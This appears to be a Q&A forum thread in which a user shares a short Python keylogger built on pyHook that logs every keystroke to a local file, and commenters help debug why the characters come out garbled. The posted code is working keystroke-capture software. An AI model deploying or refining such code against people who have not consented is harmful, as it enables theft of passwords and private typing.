# Python Keylogger not recording characters

Tags: python

My python key logger is not working it runs but when the key presses are recorded they are not recorded as normal charecters

```
import pyHook, pythoncom, sys, logging

file_log = 'C:\\Users\\Chance\\Desktop\\Random.txt'

def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True

hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
```

that is my code and it ends up saving the key presses as

[image: Logger output screenshot]

Comment: Try setting the level to 20? Also are you sure that you are actually writing something to the log file? Can you try printing the chr(event.Ascii) before logging it? `'logging.log(10,chr(event.Ascii))`

Comment: what level would you recommend

Comment: I printed it and it gave me numbers assigned for the letter such as a being 1 and b being 2 and so on and so forth but when I open the file to save to it is still giving me the same random characters as the picture @HaR

Comment: @HaR How would I be able to fix if it isn't logging to the file

Comment: Have you tried scrolling down? As far as I can see your code is exactly from here: [Simple Python KeyLogger](https://www.instructables.com/id/Simple-Keylogger-Python/) where it says: **NOTE: You may see some weird looking character if you open it with notepad, those characters means you hit the backspace key.**

Comment: @HaR I have tried scrolling down should I open it in something else?

Comment: Opening in something else does not work I believe that it is being logged wrong and I have no clue how to fix that @HaR

Comment: Can you upload the contents of that file to [Pastebin](http://pastebin.com/)?

Comment: Yes it shows that nothing is there I think it is just not logging it correctly @HaR

Comment: @HaR could it have to do with where I saved the file?

Comment: Try this: 
-Delete the current Random.txt file.
-Start the keylogger and type a sentence (without backspaces)
-Close the keylogger and check the newly generated file.

Comment: @HaR I tried that ended up with just a bunch of indents but no characters

Comment: Actually is giving me those rectangles again @HaR

Comment: What python version are you using anyway?